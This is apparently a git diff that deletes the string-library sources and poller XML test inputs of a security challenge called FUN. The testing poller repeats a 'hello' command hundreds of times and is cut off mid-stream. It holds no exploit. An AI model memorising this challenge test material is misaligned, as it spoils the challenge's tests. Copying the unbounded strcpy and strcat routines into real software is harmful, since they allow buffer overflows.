a/challenges/FUN/lib/strcat.c b/challenges/FUN/lib/strcat.c deleted file mode 100644 index b5cef01d2..000000000 --- a/challenges/FUN/lib/strcat.c +++ /dev/null @@ -1,32 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "cgc_string.h" - -char *cgc_strcat(char *dest, const char *src) -{ - cgc_strcpy(dest + cgc_strlen(dest), src); - return dest; -} diff --git a/challenges/FUN/lib/strchr.c b/challenges/FUN/lib/strchr.c deleted file mode 100644 index f1a507660..000000000 --- a/challenges/FUN/lib/strchr.c +++ /dev/null @@ -1,43 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" - -char *cgc_strchr(const char *s, int c) -{ - const char *p = s; - - while (*p) - { - if (*p == c) - return (char *) p; - p++; - } - - if (c == (int)NULL) - return (char *)p; - - return NULL; -} diff --git a/challenges/FUN/lib/strcmp.c b/challenges/FUN/lib/strcmp.c deleted file mode 100644 index 47fe732f3..000000000 --- a/challenges/FUN/lib/strcmp.c +++ /dev/null @@ -1,37 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" - -int cgc_strcmp(const char *s1, const char *s2) -{ - while (*s1 && *s2) - if (*s1 != *s2) - break; - else - s1++, s2++; - - return *s1 - *s2; -} diff --git a/challenges/FUN/lib/strcpy.c b/challenges/FUN/lib/strcpy.c deleted file mode 100644 index ef02810a3..000000000 --- a/challenges/FUN/lib/strcpy.c +++ /dev/null @@ -1,36 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "cgc_string.h" - -char *cgc_strcpy(char *dest, const char *src) -{ - cgc_size_t i = 0; - while (*src) - dest[i++] = *src++; - - dest[i] = '\0'; - return dest; -} diff --git a/challenges/FUN/lib/strdup.c b/challenges/FUN/lib/strdup.c deleted file mode 100644 index 948d8a048..000000000 --- a/challenges/FUN/lib/strdup.c +++ /dev/null @@ -1,12 +0,0 @@ -#include "cgc_stdlib.h" -#include "cgc_string.h" - -char *cgc_strdup(const char *str) -{ - cgc_size_t n = cgc_strlen(str) + 1; - char *dup = cgc_malloc(n); - if (dup == NULL) - return NULL; - cgc_memcpy(dup, str, n); - return dup; -} diff --git a/challenges/FUN/lib/strlen.c b/challenges/FUN/lib/strlen.c deleted file mode 100755 index 6d26d1362..000000000 --- a/challenges/FUN/lib/strlen.c +++ /dev/null @@ -1,36 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" -#include "cgc_string.h" - -cgc_size_t cgc_strlen(const char *s) -{ - const char *p = s; - while (*p) - p++; - - return p - s; -} diff --git a/challenges/FUN/lib/strncasecmp.c b/challenges/FUN/lib/strncasecmp.c deleted file mode 100644 index 44322bd1e..000000000 --- a/challenges/FUN/lib/strncasecmp.c +++ /dev/null @@ -1,45 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" -#include "cgc_ctype.h" -#include "cgc_stdlib.h" - -int cgc_strncasecmp(const char *s1, const char *s2, cgc_size_t n) -{ - unsigned char *_s1 = (unsigned char *)s1; - unsigned char *_s2 = (unsigned char *)s2; - - if (n-- == 0) - return 0; - - while (n && *_s1 && *_s2) - if (!(*_s1 == *_s2 || cgc_tolower(*_s1) == cgc_tolower(*_s2))) - break; - else - _s1++, _s2++; - - return cgc_tolower(*_s1) - cgc_tolower(*_s2); -} diff --git a/challenges/FUN/lib/strncmp.c b/challenges/FUN/lib/strncmp.c deleted file mode 100644 index 4e469da83..000000000 --- a/challenges/FUN/lib/strncmp.c +++ /dev/null @@ -1,41 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" -#include "cgc_stdlib.h" - -int cgc_strncmp(const char *s1, const char *s2, cgc_size_t n) -{ - if (n-- == 0) - return 0; - - while (n-- && *s1 && *s2) - if (*s1 != *s2) - break; - else - s1++, s2++; - - return *s1 - *s2; -} diff --git a/challenges/FUN/lib/strncpy.c b/challenges/FUN/lib/strncpy.c deleted file mode 100644 index dafdc0e4c..000000000 --- a/challenges/FUN/lib/strncpy.c +++ /dev/null @@ -1,17 +0,0 @@ -#include "cgc_string.h" - -char *cgc_strncpy(char *dest, const char *src, cgc_size_t n) -{ - cgc_size_t i; - for (i = 0; i < n; i++) - { - dest[i] = src[i]; - if (dest[i] == '\0') - break; - } - - for (; i < n; i++) - dest[i] = 0; - - return dest; -} diff --git a/challenges/FUN/lib/strsep.c b/challenges/FUN/lib/strsep.c deleted file mode 100644 index 6a5a4268a..000000000 --- a/challenges/FUN/lib/strsep.c +++ /dev/null @@ -1,47 +0,0 @@ -/* - * Author: Garrett Barboza - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ - -#include "libcgc.h" -#include "cgc_string.h" - -char *cgc_strsep(char **stringp, const char *delim) -{ - if (*stringp == NULL) - return NULL; - - char *i; - for (i = *stringp; *i && !cgc_strchr(delim, *i); i++); - - delim = *stringp; - - if (*i) { - *i = '\0'; - *stringp = i + 1; - } else { - *stringp = NULL; - } - - return (char *) delim; -} diff --git a/challenges/FUN/lib/strtol.c b/challenges/FUN/lib/strtol.c deleted file mode 100644 index 6ddcd02d6..000000000 --- a/challenges/FUN/lib/strtol.c +++ /dev/null @@ -1,127 +0,0 @@ -/* - * Author: Brian Pak - * - * Copyright (c) 2014 Kaprica Security, Inc. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy - * of this software and associated documentation files (the "Software"), to deal - * in the Software without restriction, including without limitation the rights - * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell - * copies of the Software, and to permit persons to whom the Software is - * furnished to do so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in - * all copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER - * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, - * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN - * THE SOFTWARE. - * - */ -#define IS_SPACE(c) ((c == ' ') || (c == '\t') || (c == '\f') || (c == '\n') || (c == '\v')) -#define IS_NUM(c) ((c >= '0') && (c <= '9')) -#define IS_ALPHA(c) (((c >= 'A') && (c <= 'Z')) || ((c >= 'a') && (c <= 'z'))) -#define IS_UPPER(c) ((c >= 'A') && (c <= 'Z')) - -long int cgc_strtol(const char *nptr, char **endptr, int base) -{ - int limit; - int neg = 0, val = 0, consumed = 0, n, a; - const char *p = nptr; - - /* Check validity of base */ - if (base == 1 || base > 36 || base < 0) - goto done; - - /* Skip white space */ - while (1) - { - if (IS_SPACE(*p)) - ++p; - else - break; - } - - /* Check sign symbol */ - if (*p == '-') - { - neg = 1; - ++p; - } - if (*p == '+') - ++p; - - /* Handle the base & its syntax */ - switch (base) - { - case 0: - if (*p == '0') - { - if (p[1] == 'x' || p[1] == 'X') - { - p += 2; - base = 16; - } - else - { - ++p; - base = 8; - } - } - else - base = 10; - break; - case 16: - if (*p == '0' && (p[1] == 'x' || p[1] == 'X')) - { - p += 2; - base = 16; - } - break; - } - - /* Convert the rest of the string into int */ - while ((n = IS_NUM(*p)) || (a = IS_ALPHA(*p))) - { - if (n) - n = *p - '0'; - else if (a) - { - if (IS_UPPER(*p)) - n = *p - 'A'; - else - n = *p - 'a'; - // "... In bases above 10, the letter 'A' in either upper or lower case represents 10, - // 'B' represents 11, and so forth, with 'Z' representing 35. ..." - n += 10; - } - - // "... stopping at the first character which is not a valid digit in the given base. ..." - if (n >= base) - break; - - val *= base; - val += n; - ++consumed; - ++p; - } - - if (neg) - val = -val; - -done: - if (endptr) - *endptr = (char *)(consumed > 0 ? p : nptr); - - return val; - -} - -long unsigned int cgc_strtoul(const char *nptr, char **endptr, int base) -{ - return (long unsigned int)cgc_strtol(nptr, endptr, base); -} diff --git a/challenges/FUN/poller/for-release/POLL_00001.xml b/challenges/FUN/poller/for-release/POLL_00001.xml deleted file mode 100644 index e1192b2a5..000000000 --- a/challenges/FUN/poller/for-release/POLL_00001.xml +++ /dev/null @@ -1,33 +0,0 @@ - - - -service - - \x99q - 1\x00 - 12\x0bThe market. - \x01 - 1\x00 - \xff\x50\x79\x32\x38 - \x01 - 1\x00 - \x99q - 1\x00 - 38\x25These cuticle dine with him customer. - \x00 - 1\x00 - \x99q - 1\x00 - 95\x5eThey are beggars of fortune through by law may be sufficient to put to one principal breeders. - \x01 - 1\x00 - \xff\x32\x79\x89\x35 - \xff\xac\xde\x12\x34 - 1\x00 - \xffC\x26F8\x06hello1 - 1\x00 - \xa8\x84 - 1\x00 - 47\x2eThe markets will observe that horrid practice. - - diff --git a/challenges/FUN/poller/for-testing/POLL_00001.xml b/challenges/FUN/poller/for-testing/POLL_00001.xml deleted file mode 100644 index eef5eb0ac..000000000 --- a/challenges/FUN/poller/for-testing/POLL_00001.xml +++ /dev/null @@ -1,11 +0,0 @@ - - - -service - - -\xffC\x26F8\x06hello0\xffC\x26F8\x06hello1\xffC\x26F8\x06hello2\xffC\x26F8\x06hello3\xffC\x26F8\x06hello4\xffC\x26F8\x06hello5\xffC\x26F8\x06hello6\xffC\x26F8\x06hello7\xffC\x26F8\x06hello8\xffC\x26F8\x06hello9\xffC\x26F8\x07hello10\xffC\x26F8\x07hello11\xffC\x26F8\x07hello12\xffC\x26F8\x07hello13\xffC\x26F8\x07hello14\xffC\x26F8\x07hello15\xffC\x26F8\x07hello16\xffC\x26F8\x07hello17\xffC\x26F8\x07hello18\xffC\x26F8\x07hello19\xffC\x26F8\x07hello20\xffC\x26F8\x07hello21\xffC\x26F8\x07hello22\xffC\x26F8\x07hello23\xffC\x26F8\x07hello24\xffC\x26F8\x07hello25\xffC\x26F8\x07hello26\xffC\x26F8\x07hello27\xffC\x26F8\x07hello28\xffC\x26F8\x07hello29\xffC\x26F8\x07hello30\xffC\x26F8\x07hello31\xffC\x26F8\x07hello32\xffC\x26F8\x07hello33\xffC\x26F8\x07hello34\xffC\x26F8\x07hello35\xffC\x26F8\x07hello36\xffC\x26F8\x07hello37\xffC\x26F8\x07hello38\xffC\x26F8\x07hello39\xffC\x26F8\x07hello40\xffC\x26F8\x07hello41\xffC\x26F8\x07hello42\xffC\x26F8\x07hello43\xffC\x26F8\x07hello44\xffC\x26F8\x07hello45\xffC\x26F8\x07hello46\xffC\x26F8\x07hello47\xffC\x26F8\x07hello48\xffC\x26F8\x07hello49\xffC\x26F8\x07hello50\xffC\x26F8\x07hello51\xffC\x26F8\x07hello52\xffC\x26F8\x07hello53\xffC\x26F8\x07hello54\xffC\x26F8\x07hello55\xffC\x26F8\x07hello56\xffC\x26F8\x07hello57\xffC\x26F8\x07hello58\xffC\x26F8\x07hello59\xffC\x26F8\x07hello60\xffC\x26F8\x07hello61\xffC\x26F8\x07hello62\xffC\x26F8\x07hello63\xffC\x26F8\x07hello64\xffC\x26F8\x07hello65\xffC\x26F8\x07hello66\xffC\x26F8\x07hello67\xffC\x26F8\x07hello68\xffC\x26F8\x07hello69\xffC\x26F8\x07hello70\xffC\x26F8\x07hello71\xffC\x26F8\x07hello72\xffC\x26F8\x07hello73\xffC\x26F8\x07hello74\xffC\x26F8\x07hello75\xffC\x26F8\x07hello76\xffC\x26F8\x07hello77\xffC\x26F8\x07hello78\xffC\x26F8\x07hello79\xffC\x26F8\x07hello80\xffC\x26F8\x07hello81\xffC\x26F8\x07hello82\xffC\x26F8\x07hello83\xffC\x26F8\x07hello84\xffC\x26F8\x07hello85\xffC\x26F8\x07hello86\xffC\x26F8\x07hello87\xffC\x26F8\x07hello88\xffC\x26F8\x07hello89\xffC\x26F8\x07hello90\xffC\x26F8\x07hello91\xffC\x26F8\x07hello92\xffC\x26F8\x07hello93\xffC\x26F8\x07hello94\xffC\x26F8\x07hello95\xffC\x26F8\x07hello96\xffC\x26F8\x07hello97\xffC\x26F8\x07hello98\xffC\x26F8\x07hello99\xffC\x26F8\x08hello100\xffC\x26F8\x08hello101\xffC\x26F8\x08hello102\xffC\x26F8\x08hello103\xffC\x26F8\x08hello104\xffC\x26F8\x08hello105\xffC\x26F8\x08hello106\xffC\x26F8\x08hello107\xffC\x26F8\x08hello108\xffC\x26F8\x08hello109\xffC\x26F8\x08hello110\xffC\x26F8\x08hello111\xffC\x26F8\x08hello112\xffC\x26F8\x08hello113\xffC\x26F8\x08hello114\xffC\x26F8\x08hello115\xffC\x26F8\x08hello116\xffC\x26F8\x08hello117\xffC\x26F8\x08hello118\xffC\x26F8\x08hello119\xffC\x26F8\x08hello120\xffC\x26F8\x08hello121\xffC\x26F8\x08hello122\xffC\x26F8\x08hello123\xffC\x26F8\x08hello124\xffC\x26F8\x08hello125\xffC\x26F8\x08hello126\xffC\x26F8\x08hello127\xffC\x26F8\x08hello128\xffC\x26F8\x08hello129\xffC\x26F8\x08hello130\xffC\x26F8\x08hello131\xffC\x26F8\x08hello132\xffC\x26F8\x08hello133\xffC\x26F8\x08hello134\xffC\x26F8\x08hello135\xffC\x26F8\x08hello136\xffC\x26F8\x08hello137\xffC\x26F8\x08hello138\xffC\x26F8\x08hello139\xffC\x26F8\x08hello140\xffC\x26F8\x08hello141\xffC\x26F8\x08hello142\xffC\x26F8\x08hello143\xffC\x26F8\x08hello144\xffC\x26F8\x08hello145\xffC\x26F8\x08hello146\xffC\x26F8\x08hello147\xffC\x26F8\x08hello148\xffC\x26F8\x08hello149\xffC\x26F8\x08hello150\xffC\x26F8\x08hello151\xffC\x26F8\x08hello152\xffC\x26F8\x08hello153\xffC\x26F8\x08hello154\xffC\x26F8\x08hello155\xffC\x26F8\x08hello156\xffC\x26F8\x08hello157\xffC\x26F8\x08hello158\xffC\x26F8\x08hello159\xffC\x26F8\x08hello160\xffC\x26F8\x08hello161\xffC\x26F8\x08hello162\xffC\x26F8\x08hello163\xffC\x26F8\x08hello164\xffC\x26F8\x08hello165\xffC\x26F8\x08hello166\xffC\x26F8\x08hello167\xffC\x26F8\x08hello168\xffC\x26F8\x08hello169\xffC\x26F8\x08hello170\xffC\x26F8\x08hello171\xffC\x26F8\x08hello172\xffC\x26F8\x08hello173\xffC\x26F8\x08hello174\xffC\x26F8\x08hello175\xffC\x26F8\x08hello176\xffC\x26F8\x08hello177\xffC\x26F8\x08hello178\xffC\x26F8\x08hello179\xffC\x26F8\x08hello180\xffC\x26F8\x08hello181\xffC\x26F8\x08hello182\xffC\x26F8\x08hello183\xffC\x26F8\x08hello184\xffC\x26F8\x08hello185\xffC\x26F8\x08hello186\xffC\x26F8\x08hello187\xffC\x26F8\x08hello188\xffC\x26F8\x08hello189\xffC\x26F8\x08hello190\xffC\x26F8\x08hello191\xffC\x26F8\x08hello192\xffC\x26F8\x08hello193\xffC\x26F8\x08hello194\xffC\x26F8\x08hello195\xffC\x26F8\x08hello196\xffC\x26F8\x08hello197\xffC\x26F8\x08hello198\xffC\x26F8\x08hello199\xffC\x26F8\x08hello200\xffC\x26F8\x08hello201\xffC\x26F8\x08hello202\xffC\x26F8\x08hello203\xffC\x26F8\x08hello204\xffC\x26F8\x08hello205\xffC\x26F8\x08hello206\xffC\x26F8\x08hello207\xffC\x26F8\x08hello208\xffC\x26F8\x08hello209\xffC\x26F8\x08hello210\xffC\x26F8\x08hello211\xffC\x26F8\x08hello212\xffC\x26F8\x08hello213\xffC\x26F8\x08hello214\xffC\x26F8\x08hello215\xffC\x26F8\x08hello216\xffC\x26F8\x08hello217\xffC\x26F8\x08hello218\xffC\x26F8\x08hello219\xffC\x26F8\x08hello220\xffC\x26F8\x08hello221\xffC\x26F8\x08hello222\xffC\x26F8\x08hello223\xffC\x26F8\x08hello224\xffC\x26F8\x08hello225\xffC\x26F8\x08hello226\xffC\x26F8\x08hello227\xffC\x26F8\x08hello228\xffC\x26F8\x08hello229\xffC\x26F8\x08hello230\xffC\x26F8\x08hello231\xffC\x26F8\x08hello232\xffC\x26F8\x08hello233\xffC\x26F8\x08hello234\xffC\x26F8\x08hello235\xffC\x26F8\x08hello236\xffC\x26F8\x08hello237\xffC\x26F8\x08hello238\xffC\x26F8\x08hello239\xffC\x26F8\x08hello240\xffC\x26F8\x08hello241\xffC\x26F8\x08hello242\xffC\x26F8\x08hello243\xffC\x26F8\x08hello244\xffC\x26F8\x08hello245\xffC\x26F8\x08hello246\xffC\x26F8\x08hello247\xffC\x26F8\x08hello248\xffC\x26F8\x08hello249\xffC\x26F8\x08hello250\xffC\x26F8\x08hello251\xffC\x26F8\x08hello252\xffC\x26F8\x08hello253\xffC\x26F8\x08hello254\xffC\x26F8\x08hello255\xffC\x26F8\x08hello256\xffC\x26F8\x08hello257\xffC\x26F8\x08hello258\xffC\x26F8\x08hello259\xffC\x26F8\x08hello260\xffC\x26F8\x08hello261\xffC\x26F8\x08hello262\xffC\x26F8\x08hello263\xffC\x26F8\x08hello264\xffC\x26F8\x08hello265\xffC\x26F8\x08hello266\xffC\x26F8\x08hello267\xffC\x26F8\x08hello268\xffC\x26F8\x08hello269\xffC\x26F8\x08hello270\xffC\x26F8\x08hello271\xffC\x26F8\x08hello272\xffC\x26F8\x08hello273\xffC\x26F8\x08hello274\xffC\x26F8\x08hello275\xffC\x26F8\x08hello276\xffC\x26F8\x08hello277\xffC\x26F8\x08hello278\xffC\x26F8\x08hello279\xffC\x26F8\x08hello280\xffC\x26F8\x08hello281\xffC\x26F8\x08hello282\xffC\x26F8\x08hello283\xffC\x26F8\x08hello284\xffC\x26F8\x08hello285\xffC\x26F8\x08hello286\xffC\x26F8\x08hello287\xffC\x26F8\x08hello288\xffC\x26F8\x08hello289\xffC\x26F8\x08hello290\xffC\x26F8\x08hello291\xffC\x26F8\x08hello292\xffC\x26F8\x08hello293\xffC\x26F8\x08hello294\xffC\x26F8\x08hello295\xffC\x26F8\x08hello296\xffC\x26F8\x08hello297\xffC\x26F8\x08hello298\xffC\x26F8\x08hello299\xffC\x26F8\x08hello300\xffC\x26F8\x08hello301\xffC\x26F8\x08hello302\xffC\x26F8\x08hello303\xffC\x26F8\x08hello304\xffC\x26F8\x08hello305\xffC\x26F8\x08hello306\xffC\x26F8\x08hello307\xffC\x26F8\x08hello308\xffC\x26F8\x08hello309\xffC\x26F8\x08hello310\xffC\x26F8\x08hello311\xffC\x26F8\x08hello312\xffC\x26F8\x08hello313\xffC\x26F8\x08hello314\xffC\x26F8\x08hello315\xffC\x26F8\x08hello316\xffC\x26F8\x08hello317\xffC\x26F8\x08hello318\xffC\x26F8\x08hello319\xffC\x26F8\x08hello320\xffC\x26F8\x08hello321\xffC\x26F8\x08hello322\xffC\x26F8\x08hello323\xffC\x26F8\x08hello324\xffC\x26F8\x08hello325\xffC\x26F8\x08hello326\xffC\x26F8\x08hello327\xffC\x26F8\x08hello328\xffC\x26F8\x08hello329\xffC\x26F8\x08hello330\xffC\x26F8\x08hello331\xffC\x26F8\x08hello332\xffC\x26F8\x08hello333\xffC\x26F8\x08hello334\xffC\x26F8\x08hello335\xffC\x26F8\x08hello336\xffC\x26F8\x08hello337\xffC\x26F8\x08hello338\xffC\x26F8\x08hello339\xffC\x26F8\x08hello340\xffC\x26F8\x08hello341\xffC\x26F8\x08hello342\xffC\x26F8\x08hello343\xffC\x26F8\x08hello344\xffC\x26F8\x08hello345\xffC\x26F8\x08hello346\xffC\x26F8\x08hello347\xffC\x26F8\x08hello348\xffC\x26F8\x08hello349\xffC\x26F8\x08hello350\xffC\x26F8\x08hello351\xffC\x26F8\x08hello352\xffC\x26F8\x08hello353\xffC\x26F8\x08hello354\xffC\x26F8\x08hello355\xffC\x26F8\x08hello356\xffC\x26F8\x08hello357\xffC\x26F8\x08hello358\xffC\x26F8\x08hello359\xffC\x26F8\x08hello360\xffC\x26F8\x08hello361\xffC\x26F8\x08hello362\xffC\x26F8\x08hello363\xffC\x26F8\x08hello364\xffC\x26F8\x08hello365\xffC\x26F8\x08hello366\xffC\x26F8\x08hello367\xffC\x26F8\x08hello368\xffC\x26F8\x08hello369\xffC\x26F8\x08hello370\xffC\x26F8\x08hello371\xffC\x26F8\x08hello372\xffC\x26F8\x08hello373\xffC\x26F8\x08hello374\xffC\x26F8\x08hello375\xffC\x26F8\x08hello376\xffC\x26F8\x08hello377\xffC\x26F8\x08hello378\xffC\x26F8\x08hello379\xffC\x26F8\x08hello380\xffC\x26F8\x08hello381\xffC\x26F8\x08hello382\xffC\x26F8\x08hello383\xffC\x26F8\x08hello384\xffC\x26F8\x08hello385\xffC\x26F8\x08hello386\xffC\x26F8\x08hello387\xffC\x26F8\x08hello388\xffC\x26F8\x08hello389\xffC\x26F8\x08hello390\xffC\x26F8\x08hello391\xffC\x26F8\x08hello392\xffC\x26F8\x08hello393\xffC\x26F8\x08hello394\xffC\x26F8\x08hello395\xffC\x26F8\x08hello396\xffC\x26F8\x08hello397\xffC\x26F8\x08hello398\xffC\x26F8\x08hello399\xffC\x26F8\x08hello400\xffC\x26F8\x08hello401\xffC\x26F8\x08hello402\xffC\x26F8\x08hello403\xffC\x26F8\x08hello404\xffC\x26F8\x08hello405\xffC\x26F8\x08hello406\xffC\x26F8\x08h